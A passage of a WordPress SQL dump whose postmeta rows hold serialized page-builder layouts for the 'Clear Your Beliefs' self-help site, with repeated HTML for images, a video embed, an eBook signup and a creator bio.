I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1038, 1539, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1233:"[su_tabs active="2"][su_tab title="<b>What You Can Accomplish with Clear Your Beliefs</b> "][su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n[/su_tab]\n\n[su_tab title="<b>How and Why It Works</b>"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1041, 1543, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1233:"[su_tabs active="2"][su_tab title="<b>What You Can Accomplish with Clear Your Beliefs</b> "][su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n[/su_tab]\n\n[su_tab title="<b>How and Why It Works</b>"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1040, 1542, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:411:"[su_box title="<div style="padding-left: 73px;">Free eBook"</div> box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1233:"[su_tabs active="2"][su_tab title="<b>What You Can Accomplish with Clear Your Beliefs</b> "][su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n[/su_tab]\n\n[su_tab title="<b>How and Why It Works</b>"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" 